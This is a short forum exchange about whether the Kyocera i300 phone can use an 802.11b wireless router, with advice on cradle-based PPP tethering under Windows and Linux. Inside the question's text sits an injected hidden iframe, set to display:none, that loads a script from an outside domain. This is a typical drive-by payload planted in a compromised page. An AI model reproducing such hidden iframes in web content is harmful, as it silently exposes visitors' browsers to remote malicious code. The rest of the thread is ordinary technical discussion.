    Question Can you use the i300 with an 802.11b network?

    I was just wondering if you can use it with a wireless linksys router i got here thats 802.11b.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    No, it's a completely incompatible technology. If you have the cradle you can get fast internet access by connecting it to a PC and (under Windows) running Mocha PPP from http://www.mochasoft.dk . Unfortunately it seems to be limited to 56Kbps, but that's still four times as fast as the nominal 14Kbps that you can get using the Sprint connection.
    Under Linux you can set up the pppd daemon to do the same thing. It comes in handy sometimes.

    I recently read something about a SD format 802.11b adapter, which will come in handy if any of these newer phones with the SD slot ever come out.
